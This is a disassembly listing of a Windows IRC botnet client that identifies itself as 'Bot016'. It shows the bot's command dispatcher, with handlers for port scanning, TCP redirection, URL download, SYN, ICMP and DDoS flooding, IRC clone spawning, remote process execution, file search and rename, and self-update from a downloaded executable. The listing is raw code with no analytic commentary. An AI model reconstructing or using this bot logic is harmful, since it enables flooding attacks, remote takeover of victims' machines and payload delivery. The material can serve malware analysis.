loc_40AE0B: ; CODE XREF: sub_408A18+23F8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AE0B
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_4150B0
mov esi, eax
push esi
lea eax, [ebp+var_2F0]
push offset dword_426F84
push eax
call sub_4145E5
add esp, 14h
test esi, esi
jz loc_40E538
mov edi, [ebp+var_C]
push edi
call sub_414972
test eax, eax
pop ecx
jle loc_40E538
push edi
call sub_414972
cmp eax, 1F4h
pop ecx
jge loc_40E538
xor ebx, ebx
push ebx
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_10]
push edi
call sub_414972
imul eax, 234h
pop ecx
push dword_43668C[eax]
call sub_4056FB
push edi
call sub_414972
imul eax, 234h
add esp, 18h
cmp byte ptr dword_436480[eax], 73h
jnz loc_40E538
push esi
push edi
call sub_414972
imul eax, 234h
pop ecx
add eax, offset byte_436698
push eax
push [ebp+var_10]
push offset aSSS_2 ; "[%s] * %s %s"
loc_40AEC6: ; CODE XREF: sub_408A18+25C9�j
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
push ebx
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
jmp loc_40D175
; ---------------------------------------------------------------------------
loc_40AEF0: ; CODE XREF: sub_408A18+2366�j
; sub_408A18+237A�j
push [ebp+var_C]
call sub_414972
imul eax, 234h
cmp byte_436698[eax], 0
pop ecx
jz loc_40E538
mov edi, [ebp+var_14]
test edi, edi
jz loc_40E538
mov eax, [ebp+var_1C]
lea edx, [eax+1]
loc_40AF1D: ; CODE XREF: sub_408A18+250A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AF1D
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_C]
lea ecx, [eax+1]
loc_40AF2E: ; CODE XREF: sub_408A18+251B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AF2E
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_40AF3F: ; CODE XREF: sub_408A18+252C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AF3F
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_4150B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E538
mov edi, [ebp+var_C]
push edi
call sub_414972
test eax, eax
pop ecx
jle loc_40E538
push edi
call sub_414972
cmp eax, 1F4h
pop ecx
jge loc_40E538
xor ebx, ebx
push ebx
push ebx
push esi
push [ebp+var_10]
push edi
call sub_414972
imul eax, 234h
pop ecx
push dword_43668C[eax]
call sub_4056FB
push edi
call sub_414972
imul eax, 234h
add esp, 18h
cmp byte ptr dword_436480[eax], 73h
jnz loc_40E538
push esi
push edi
call sub_414972
imul eax, 234h
pop ecx
add eax, offset byte_436698
push eax
push [ebp+var_10]
push offset aSSS_1 ; "[%s] <%s> %s"
jmp loc_40AEC6
; ---------------------------------------------------------------------------
loc_40AFE6: ; CODE XREF: sub_408A18+233E�j
; sub_408A18+2352�j
push [ebp+var_C]
call dword_43585C ; inet_addr
push [ebp+var_10]
mov [ebp+var_308], eax
call sub_414972
push [ebp+arg_0]
mov [ebp+var_314], eax
call sub_414972
mov edi, [ebp+arg_4]
push 7Fh
push [ebp+var_A0]
mov [ebp+var_310], eax
lea eax, [ebp+var_394]
push eax
mov [ebp+var_398], edi
call sub_414670
mov eax, [ebp+var_8]
mov ebx, [ebp+var_4]
add esp, 14h
push [ebp+var_310]
mov [ebp+var_300], ebx
push [ebp+var_314]
mov [ebp+var_2FC], eax
push [ebp+var_308]
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+var_2F0]
push offset aScanPortScanSt ; "[SCAN]: Port scan started: %s:%d with d"...
push eax
call sub_4145E5
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_412471
add esp, 20h
mov [ebp+var_30C], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_398]
push eax
push offset sub_40FE55
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_30C]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40B0CF
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
jmp loc_40B54C
; ---------------------------------------------------------------------------
loc_40B0C7: ; CODE XREF: sub_408A18+26BD�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B0CF: ; CODE XREF: sub_408A18+269C�j
cmp [ebp+var_2F8], esi
jz short loc_40B0C7
jmp loc_40B55B
; ---------------------------------------------------------------------------
loc_40B0DC: ; CODE XREF: sub_408A18+2316�j
; sub_408A18+232A�j
push [ebp+var_C]
call sub_414972
push 7Fh
push [ebp+var_10]
mov [ebp+var_F0C], eax
lea eax, [ebp+var_1010]
push eax
call sub_414670
push [ebp+arg_0]
call sub_414972
push [ebp+var_A0]
mov esi, [ebp+arg_4]
mov [ebp+var_F10], eax
lea eax, [ebp+var_F90]
push 80h
push eax
mov [ebp+var_1018], esi
call sub_41483D
mov eax, [ebp+var_8]
mov ebx, [ebp+var_4]
add esp, 20h
push [ebp+var_F10]
mov [ebp+var_EFC], eax
lea eax, [ebp+var_1010]
push eax
push [ebp+var_F0C]
mov [ebp+var_F00], ebx
push esi
call sub_407D51
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aRedirectTcpRed ; "[REDIRECT]: TCP redirect created from: "...
push eax
call sub_4145E5
xor edi, edi
push edi
lea eax, [ebp+var_2F0]
push 11h
push eax
call sub_412471
add esp, 24h
mov [ebp+var_F08], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_1018]
push eax
push offset sub_40EF12
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_F08]
imul ecx, 234h
cmp eax, edi
mov dword_436694[ecx], eax
jnz short loc_40B1CC
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFailed ; "[REDIRECT]: Failed to start redirection"...
jmp loc_40B33C
; ---------------------------------------------------------------------------
loc_40B1C4: ; CODE XREF: sub_408A18+27BA�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B1CC: ; CODE XREF: sub_408A18+2799�j
cmp [ebp+var_EF8], edi
jz short loc_40B1C4
jmp loc_40B34B
; ---------------------------------------------------------------------------
loc_40B1D9: ; CODE XREF: sub_408A18+22EE�j
; sub_408A18+2302�j
mov esi, 0FFh
push esi
push [ebp+var_C]
lea eax, [ebp+var_E64]
push eax
call sub_414670
push [ebp+arg_0]
xor edi, edi
mov [ebp+var_B60], edi
call sub_414972
mov [ebp+var_B5C], eax
mov eax, [ebp+ebx+var_98]
add esp, 10h
cmp eax, edi
jz short loc_40B226
push 10h
push edi
push eax
call sub_415409
add esp, 0Ch
mov [ebp+var_B54], eax
jmp short loc_40B22C
; ---------------------------------------------------------------------------
loc_40B226: ; CODE XREF: sub_408A18+27F8�j
mov [ebp+var_B54], edi
loc_40B22C: ; CODE XREF: sub_408A18+280C�j
mov ebx, [ebp+ebx+var_94]
cmp ebx, edi
jz short loc_40B246
push ebx
call sub_414972
pop ecx
mov [ebp+var_B58], eax
jmp short loc_40B24C
; ---------------------------------------------------------------------------
loc_40B246: ; CODE XREF: sub_408A18+281D�j
mov [ebp+var_B58], edi
loc_40B24C: ; CODE XREF: sub_408A18+282C�j
push 3Fh
push [ebp+var_10]
call sub_415A90
mov ebx, eax
cmp ebx, edi
pop ecx
pop ecx
jz short loc_40B286
and byte ptr [ebx], 0
inc ebx
loc_40B262: ; CODE XREF: sub_408A18+285B�j
push 26h
push ebx
call sub_415A90
cmp eax, edi
pop ecx
pop ecx
jz short loc_40B275
mov byte ptr [eax], 20h
jmp short loc_40B262
; ---------------------------------------------------------------------------
loc_40B275: ; CODE XREF: sub_408A18+2856�j
push esi
lea eax, [ebp+var_C64]
push ebx
push eax
call sub_414670
add esp, 0Ch
loc_40B286: ; CODE XREF: sub_408A18+2844�j
push esi
push [ebp+var_10]
lea eax, [ebp+var_D64]
push eax
call sub_414670
movzx eax, [ebp+var_457]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_A0]
mov [ebp+var_B50], eax
lea eax, [ebp+var_EE4]
push eax
mov [ebp+var_EE8], esi
call sub_414670
push [ebp+var_10]
mov eax, [ebp+var_8]
push [ebp+var_C]
mov ebx, [ebp+var_4]
mov [ebp+var_B4C], eax
lea eax, [ebp+var_2F0]
push offset aDownloadDown_1 ; "[DOWNLOAD]: Downloading URL: %s to: %s."...
push eax
mov [ebp+var_B48], ebx
call sub_4145E5
push esi
lea eax, [ebp+var_2F0]
push 16h
push eax
call sub_412471
add esp, 34h
mov [ebp+var_B64], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_EE8]
push eax
push offset sub_40260A
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_B64]
imul ecx, 234h
cmp eax, edi
mov dword_436694[ecx], eax
jnz short loc_40B371
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aDownloadFailed ; "[DOWNLOAD]: Failed to start transfer th"...
loc_40B33C: ; CODE XREF: sub_408A18+27A7�j
; sub_408A18+443D�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
add esp, 0Ch
loc_40B34B: ; CODE XREF: sub_408A18+27BC�j
; sub_408A18+2961�j ...
cmp [ebp+var_8], edi
jnz loc_40DA31
push edi
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push esi
jmp loc_40DA29
; ---------------------------------------------------------------------------
loc_40B369: ; CODE XREF: sub_408A18+295F�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B371: ; CODE XREF: sub_408A18+2916�j
cmp [ebp+var_B44], edi
jz short loc_40B369
jmp short loc_40B34B
; ---------------------------------------------------------------------------
loc_40B37B: ; CODE XREF: sub_408A18+22C6�j
; sub_408A18+22DA�j
push 7Fh
pop esi
push esi
push [ebp+var_C]
lea eax, [ebp+var_18D4]
push eax
call sub_414670
push esi
push [ebp+var_10]
lea eax, [ebp+var_1854]
push eax
call sub_414670
push esi
push [ebp+arg_0]
lea eax, [ebp+var_17D4]
push eax
call sub_414670
push esi
push [ebp+var_A0]
lea eax, [ebp+var_1754]
push eax
call sub_414670
push [ebp+arg_0]
mov eax, [ebp+var_8]
push [ebp+var_10]
mov ebx, [ebp+var_4]
push [ebp+var_C]
mov edi, [ebp+arg_4]
mov [ebp+var_16CC], eax
lea eax, [ebp+var_2F0]
push offset aSynFloodingSSF ; "[SYN]: Flooding: (%s:%s) for %s seconds"...
push eax
mov [ebp+var_16D0], ebx
mov [ebp+var_18D8], edi
call sub_4145E5
add esp, 44h
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Ch
push eax
call sub_412471
add esp, 0Ch
mov [ebp+var_16D4], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_18D8]
push eax
push offset sub_411540
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_16D4]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40B45B
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aSynFailedToSta ; "[SYN]: Failed to start flood thread, er"...
jmp loc_40B54C
; ---------------------------------------------------------------------------
loc_40B453: ; CODE XREF: sub_408A18+2A49�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B45B: ; CODE XREF: sub_408A18+2A28�j
cmp [ebp+var_16C8], esi
jz short loc_40B453
jmp loc_40B55B
; ---------------------------------------------------------------------------
loc_40B468: ; CODE XREF: sub_408A18+228A�j
; sub_408A18+229E�j ...
push 7Fh
pop esi
push esi
push [ebp+var_C]
lea eax, [ebp+var_1B64]
push eax
call sub_414670
push esi
push [ebp+var_10]
lea eax, [ebp+var_1AE4]
push eax
call sub_414670
push esi
push [ebp+arg_0]
lea eax, [ebp+var_1A64]
push eax
call sub_414670
push esi
push [ebp+var_A0]
lea eax, [ebp+var_19E4]
push eax
call sub_414670
push 20h
push [ebp+var_1C]
lea eax, [ebp+var_1964]
push eax
call sub_414670
push [ebp+arg_0]
mov eax, [ebp+var_8]
push [ebp+var_10]
mov ebx, [ebp+var_4]
push [ebp+var_C]
mov edi, [ebp+arg_4]
mov [ebp+var_18E0], eax
lea eax, [ebp+var_2F0]
push offset aDdosFloodingSS ; "[DDoS]: Flooding: (%s:%s) for %s second"...
push eax
mov [ebp+var_18E4], ebx
mov [ebp+var_1B6C], edi
call sub_4145E5
add esp, 50h
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Bh
push eax
call sub_412471
add esp, 0Ch
mov [ebp+var_1B68], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1B6C]
push eax
push offset sub_40253C
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_1B68]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40B581
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aDdosFailedToSt ; "[DDoS]: Failed to start flood thread, e"...
loc_40B54C: ; CODE XREF: sub_408A18+26AA�j
; sub_408A18+2A36�j
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
add esp, 0Ch
loc_40B55B: ; CODE XREF: sub_408A18+26BF�j
; sub_408A18+2A4B�j ...
cmp [ebp+var_8], esi
jnz loc_40DA31
push esi
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push edi
jmp loc_40DA29
; ---------------------------------------------------------------------------
loc_40B579: ; CODE XREF: sub_408A18+2B6F�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B581: ; CODE XREF: sub_408A18+2B26�j
cmp [ebp+var_18DC], esi
jz short loc_40B579
jmp short loc_40B55B
; ---------------------------------------------------------------------------
loc_40B58B: ; CODE XREF: sub_408A18+2262�j
; sub_408A18+2276�j
push 7Fh
push [ebp+var_C]
lea eax, [ebp+var_141C]
push eax
call sub_414670
push [ebp+var_10]
call sub_414972
push 3Fh
push [ebp+arg_0]
mov [ebp+var_12CC], eax
lea eax, [ebp+var_139C]
push eax
call sub_414670
mov ebx, [ebp+ebx+var_98]
xor esi, esi
add esp, 1Ch
cmp ebx, esi
jz short loc_40B5DD
push 3Fh
lea eax, [ebp+var_135C]
push ebx
push eax
call sub_414670
add esp, 0Ch
loc_40B5DD: ; CODE XREF: sub_408A18+2BB1�j
lea eax, [ebp+var_139C]
push eax
push [ebp+var_12CC]
lea eax, [ebp+var_141C]
push eax
lea eax, [ebp+var_2F0]
push offset aClonesCreatedO ; "[CLONES]: Created on %s:%d, in channel "...
push eax
mov [ebp+var_12C8], 1
call sub_4145E5
push esi
lea eax, [ebp+var_2F0]
push 18h
push eax
call sub_412471
add esp, 20h
mov [ebp+var_12C4], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1420]
push eax
push offset sub_4088B9
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_12C4]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40B66C
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aClonesFailedTo ; "[CLONES]: Failed to start clone thread,"...
jmp loc_40C42E
; ---------------------------------------------------------------------------
loc_40B664: ; CODE XREF: sub_408A18+2C5A�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B66C: ; CODE XREF: sub_408A18+2C39�j
cmp [ebp+var_12C0], esi
jz short loc_40B664
jmp loc_40C43D
; ---------------------------------------------------------------------------
loc_40B679: ; CODE XREF: sub_408A18+2228�j
; sub_408A18+223C�j
push [ebp+var_10]
call sub_414972
mov ebx, [ebp+arg_4]
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_1538], eax
jle loc_40B778
push [ebp+var_C]
mov esi, 80h
lea eax, [ebp+var_16C0]
push esi
push eax
call sub_41483D
push [ebp+var_A0]
xor eax, eax
cmp [ebp+var_44A], al
push esi
setnz al
mov [ebp+var_16C4], ebx
mov [ebp+var_1534], eax
lea eax, [ebp+var_15C0]
push eax
call sub_41483D
push [ebp+var_10]
mov eax, [ebp+var_4]
push [ebp+var_C]
mov [ebp+var_1530], eax
mov eax, [ebp+var_8]
push offset aIcmpFloodingSF ; "[ICMP]: Flooding: (%s) for %s seconds."
mov [ebp+var_152C], eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41483D
push edi
lea eax, [ebp+var_2F0]
push 0Eh
push eax
call sub_412471
add esp, 38h
mov [ebp+var_1540], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_16C4]
push eax
push offset sub_405367
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_1540]
imul ecx, 234h
cmp eax, edi
mov dword_436694[ecx], eax
jnz short loc_40B76E
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aIcmpFailedToSt ; "[ICMP]: Failed to start flood thread, e"...
push eax
call sub_4145E5
add esp, 0Ch
jmp short loc_40B78B
; ---------------------------------------------------------------------------
loc_40B766: ; CODE XREF: sub_408A18+2D5C�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B76E: ; CODE XREF: sub_408A18+2D2F�j
cmp [ebp+var_1528], edi
jz short loc_40B766
jmp short loc_40B78B
; ---------------------------------------------------------------------------
loc_40B778: ; CODE XREF: sub_408A18+2C77�j
lea eax, [ebp+var_2F0]
push offset aIcmpInvalidFlo ; "[ICMP]: Invalid flood time must be grea"...
push eax
call sub_4145E5
pop ecx
pop ecx
loc_40B78B: ; CODE XREF: sub_408A18+2D4C�j
; sub_408A18+2D5E�j
cmp [ebp+var_8], edi
jnz loc_40DA31
push edi
push [ebp+var_4]
loc_40B798: ; CODE XREF: sub_408A18+5695�j
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push ebx
jmp loc_40DA29
; ---------------------------------------------------------------------------
loc_40B7AB: ; CODE XREF: sub_408A18+2200�j
; sub_408A18+2214�j
push [ebp+var_10]
push [ebp+var_C]
call ds:dword_4200F4 ; MoveFileA
test eax, eax
jz short loc_40B7DF
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push [ebp+var_C]
push offset aFileRenameSToS ; "[FILE]: Rename: '%s' to: '%s'."
push 200h
push eax
call sub_41483D
add esp, 14h
jmp loc_40DA0E
; ---------------------------------------------------------------------------
loc_40B7DF: ; CODE XREF: sub_408A18+2DA1�j
push offset aFile ; "[FILE]:"
call sub_406826
push eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41483D
add esp, 10h
jmp loc_40DA0E
; ---------------------------------------------------------------------------
loc_40B803: ; CODE XREF: sub_408A18+21D8�j
; sub_408A18+21EC�j
push [ebp+var_C]
lea eax, [ebp+var_1230]
push 104h
push eax
call sub_41483D
xor esi, esi
add esp, 0Ch
cmp [ebp+var_14], esi
jz short loc_40B841
push [ebp+var_10]
push [ebp+var_14]
call sub_4150B0
cmp eax, esi
pop ecx
pop ecx
jz short loc_40B841
push eax
lea eax, [ebp+var_112C]
push eax
call sub_4145E5
pop ecx
pop ecx
loc_40B841: ; CODE XREF: sub_408A18+2E07�j
; sub_408A18+2E18�j
push [ebp+var_A0]
lea eax, [ebp+var_12B0]
push 80h
push eax
call sub_41483D
mov eax, [ebp+arg_4]
mov [ebp+var_12B4], eax
mov eax, [ebp+var_4]
mov [ebp+var_1024], eax
mov eax, [ebp+var_8]
mov [ebp+var_1020], eax
lea eax, [ebp+var_112C]
push eax
lea eax, [ebp+var_1230]
push eax
push offset aFindfileSear_0 ; "[FINDFILE]: Searching for file: %s in: "...
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41483D
push esi
lea eax, [ebp+var_2F0]
push 1Ch
push eax
call sub_412471
add esp, 2Ch
mov [ebp+var_1028], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_12B4]
push eax
push offset sub_4030CB
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_1028]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40B906
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aFindfileFailed ; "[FINDFILE]: Failed to start search thre"...
loc_40B8EA: ; CODE XREF: sub_408A18+4168�j
; sub_408A18+4EFB�j
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
add esp, 0Ch
jmp loc_40DA31
; ---------------------------------------------------------------------------
loc_40B8FE: ; CODE XREF: sub_408A18+2EF4�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B906: ; CODE XREF: sub_408A18+2EC4�j
cmp [ebp+var_101C], esi
jz short loc_40B8FE
jmp loc_40DA31
; ---------------------------------------------------------------------------
loc_40B913: ; CODE XREF: sub_408A18+21B0�j
; sub_408A18+21C4�j
push 11h
pop ecx
push [ebp+var_C]
xor eax, eax
xor ebx, ebx
lea edi, [ebp+var_400]
rep stosd
inc ebx
xor esi, esi
mov [ebp+var_400], 44h
mov [ebp+var_3D4], ebx
mov word ptr [ebp+var_3D0], si
call sub_414972
cmp eax, ebx
pop ecx
jnz short loc_40B952
mov word ptr [ebp+var_3D0], 5
loc_40B952: ; CODE XREF: sub_408A18+2F2F�j
cmp [ebp+var_14], esi
jz loc_40C43D
push [ebp+var_10]
push [ebp+var_14]
call sub_4150B0
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jz loc_40C43D
lea eax, [ebp+var_9A0]
push eax
lea eax, [ebp+var_400]
push eax
push esi
push esi
push 30h
push ebx
push esi
push esi
push edi
push esi
call ds:dword_420038 ; CreateProcessA
test eax, eax
lea eax, [ebp+var_2F0]
jnz short loc_40B9AB
push offset aExecCouldnTExe ; "[EXEC]: Couldn't execute file."
push eax
call sub_4145E5
pop ecx
pop ecx
jmp loc_40C43D
; ---------------------------------------------------------------------------
loc_40B9AB: ; CODE XREF: sub_408A18+2F7F�j
push edi
push offset aExecCommandsS ; "[EXEC]: Commands: %s"
jmp loc_40C434
; ---------------------------------------------------------------------------
loc_40B9B6: ; CODE XREF: sub_408A18+2188�j
; sub_408A18+219C�j
mov edi, [ebp+var_10]
mov esi, offset aBot016 ; "Bot016"
loc_40B9BE: ; CODE XREF: sub_408A18+2FC2�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_40B9E0
test al, al
jz short loc_40B9DC
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_40B9E0
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40B9BE
loc_40B9DC: ; CODE XREF: sub_408A18+2FB0�j
xor eax, eax
jmp short loc_40B9E5
; ---------------------------------------------------------------------------
loc_40B9E0: ; CODE XREF: sub_408A18+2FAC�j
; sub_408A18+2FBA�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40B9E5: ; CODE XREF: sub_408A18+2FC6�j
test eax, eax
mov edi, [ebp+arg_4]
jz loc_40BB58
lea eax, [ebp+var_AB0]
push eax
push 104h
call ds:dword_4200D0 ; GetTempPathA
push 0FFh
push [ebp+var_C]
lea eax, [ebp+var_E64]
push eax
call sub_414670
lea eax, [ebp+var_9AC]
push eax
call sub_40FA49
push eax
lea eax, [ebp+var_AB0]
push eax
lea eax, [ebp+var_D64]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_4145E5
mov eax, [ebp+ebx+var_9C]
xor esi, esi
add esp, 20h
cmp eax, esi
mov [ebp+var_B60], 1
mov [ebp+var_B5C], esi
jz short loc_40BA6F
push 10h
push esi
push eax
call sub_415409
add esp, 0Ch
mov [ebp+var_B54], eax
jmp short loc_40BA75
; ---------------------------------------------------------------------------
loc_40BA6F: ; CODE XREF: sub_408A18+3041�j
mov [ebp+var_B54], esi
loc_40BA75: ; CODE XREF: sub_408A18+3055�j
mov ebx, [ebp+ebx+var_98]
cmp ebx, esi
jz short loc_40BA8F
push ebx
call sub_414972
pop ecx
mov [ebp+var_B58], eax
jmp short loc_40BA95
; ---------------------------------------------------------------------------
loc_40BA8F: ; CODE XREF: sub_408A18+3066�j
mov [ebp+var_B58], esi
loc_40BA95: ; CODE XREF: sub_408A18+3075�j
movzx eax, [ebp+var_457]
push 7Fh
push [ebp+var_A0]
mov [ebp+var_B50], eax
lea eax, [ebp+var_EE4]
push eax
mov [ebp+var_EE8], edi
call sub_414670
mov eax, [ebp+var_4]
push [ebp+var_C]
mov [ebp+var_B48], eax
mov eax, [ebp+var_8]
mov [ebp+var_B4C], eax
lea eax, [ebp+var_2F0]
push offset aUpdateDownload ; "[UPDATE]: Downloading update from: %s."
push eax
call sub_4145E5
push edi
lea eax, [ebp+var_2F0]
push 17h
push eax
call sub_412471
add esp, 24h
mov [ebp+var_B64], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_EE8]
push eax
push offset sub_40260A
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_B64]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40BB4E
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aUpdateFailedTo ; "[UPDATE]: Failed to start download thre"...
push eax
call sub_4145E5
add esp, 0Ch
jmp short loc_40BB6D
; ---------------------------------------------------------------------------
loc_40BB46: ; CODE XREF: sub_408A18+313C�j
push 32h
call ds:dword_420000 ; Sleep
loc_40BB4E: ; CODE XREF: sub_408A18+310F�j
cmp [ebp+var_B44], esi
jz short loc_40BB46
jmp short loc_40BB6D
; ---------------------------------------------------------------------------
loc_40BB58: ; CODE XREF: sub_408A18+2FD2�j
lea eax, [ebp+var_2F0]
push offset aUpdateUpToDate ; "[UPDATE]: Up to Date"
push eax
call sub_4145E5
pop ecx
pop ecx
xor esi, esi
loc_40BB6D: ; CODE XREF: sub_408A18+312C�j
; sub_408A18+313E�j
cmp [ebp+var_8], esi
jnz loc_40A140
push esi
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push edi
jmp loc_40A138
; ---------------------------------------------------------------------------
loc_40BB8D: ; CODE XREF: sub_408A18+2160�j
; sub_408A18+2174�j
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427964
pop ecx
xor eax, eax
repe cmpsb
jz loc_408C96
cmp [ebp+var_14], eax
jz loc_408C96
push [ebp+var_10]
push [ebp+var_14]
call sub_4150B0
push eax
push [ebp+var_A0]
lea eax, [ebp+var_2F0]
push [ebp+var_A4]
push [ebp+var_A8]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_4145E5
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_414670
push [ebp+var_C]
call sub_414972
add esp, 30h
test eax, eax
jle short loc_40BC16
push [ebp+var_C]
call sub_414972
imul eax, 3E8h
pop ecx
push eax
call ds:dword_420000 ; Sleep
loc_40BC16: ; CODE XREF: sub_408A18+31E6�j
push offset aMainDelay_ ; "[MAIN]: Delay."
call sub_401EFF
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_408C99
; ---------------------------------------------------------------------------
loc_40BC2A: ; CODE XREF: sub_408A18+2138�j
; sub_408A18+214C�j
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427964
pop ecx
xor eax, eax
repe cmpsb
jz loc_408C96
cmp [ebp+var_14], eax
jz loc_40E538
mov esi, [ebp+var_10]
push esi
push [ebp+var_14]
call sub_4150B0
pop ecx
pop ecx
mov ebx, eax
push 7
inc esi
pop ecx
xor eax, eax
mov edi, offset aRepeat ; "repeat"
repe cmpsb
lea eax, [ebp+var_2F0]
push ebx
jz short loc_40BCE4
push [ebp+var_A0]
push [ebp+var_A4]
push [ebp+var_A8]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_4145E5
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_414670
push ebx
lea eax, [ebp+var_2F0]
push offset aMainRepeatS ; "[MAIN]: Repeat: %s"
push eax
call sub_4145E5
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
push [ebp+var_C]
call sub_414972
add esp, 38h
test eax, eax
jle loc_40E538
push [ebp+var_C]
call sub_414972
add eax, [ebp+arg_24]
pop ecx
jmp loc_408C99
; ---------------------------------------------------------------------------
loc_40BCE4: ; CODE XREF: sub_408A18+3257�j
push offset aMainRepeatNotA ; "[MAIN]: Repeat not allowed in command l"...
jmp loc_40C24E
; ---------------------------------------------------------------------------
loc_40BCEE: ; CODE XREF: sub_408A18+2110�j
; sub_408A18+2124�j
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push offset aPartS_0 ; "PART %s"
push eax
call sub_4145E5
push [ebp+var_C]
call sub_414972
add esp, 10h
loc_40BD0D: ; CODE XREF: sub_408A18+3362�j
test eax, eax
jle loc_40E538
push [ebp+var_C]
call sub_414972
cmp eax, 1F4h
pop ecx
jge loc_40E538
loc_40BD29: ; CODE XREF: sub_408A18+3B9B�j
lea eax, [ebp+var_2F0]
push eax
push offset aS_5 ; "%s\r\n"
push [ebp+var_C]
call sub_414972
imul eax, 234h
pop ecx
push dword_43668C[eax]
call sub_4056B0
jmp loc_40D6BD
; ---------------------------------------------------------------------------
loc_40BD54: ; CODE XREF: sub_408A18+20E8�j
; sub_408A18+20FC�j
push [ebp+ebx+var_9C]
lea eax, [ebp+var_2F0]
push [ebp+var_10]
push offset aJoinSS ; "JOIN %s %s"
push eax
call sub_4145E5
push [ebp+var_C]
call sub_414972
add esp, 14h
